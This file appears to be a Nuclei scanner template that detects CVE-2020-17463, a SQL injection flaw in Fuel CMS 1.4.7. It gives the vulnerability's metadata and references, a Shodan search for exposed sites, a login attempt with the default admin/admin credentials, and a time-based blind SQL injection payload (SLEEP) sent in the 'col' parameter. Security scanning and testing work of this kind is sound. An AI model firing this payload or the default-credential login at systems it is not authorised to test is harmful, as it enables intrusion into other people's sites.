63 lines
1.7 KiB
YAML
63 lines
1.7 KiB
YAML
id: CVE-2020-17463
|
|
|
|
info:
|
|
name: Fuel CMS 1.4.7 - SQL Injection
|
|
author: Thirukrishnan
|
|
severity: high
|
|
description: |
|
|
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
|
|
remediation: Fixed in version 115
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48741
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-17463
|
|
- http://packetstormsecurity.com/files/158840/Fuel-CMS-1.4.7-SQL-Injection.html
|
|
- https://getfuelcms.com/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-17463
|
|
cwe-id: CWE-89
|
|
cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 3
|
|
verified: true
|
|
shodan-query: http.title:"fuel cms"
|
|
tags: cve,cve2020,sqli,fuel-cms,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /fuel/login/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /fuel/login/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{RootURL}}
|
|
|
|
user_name={{username}}&password={{password}}&Login=Login&forward=
|
|
|
|
- |
|
|
@timeout: 10s
|
|
GET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Referer: {{RootURL}}
|
|
|
|
payloads:
|
|
username:
|
|
- admin
|
|
password:
|
|
- admin
|
|
attack: pitchfork
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code_3 == 200'
|
|
- 'contains(body_1, "FUEL CMS")'
|
|
condition: and
|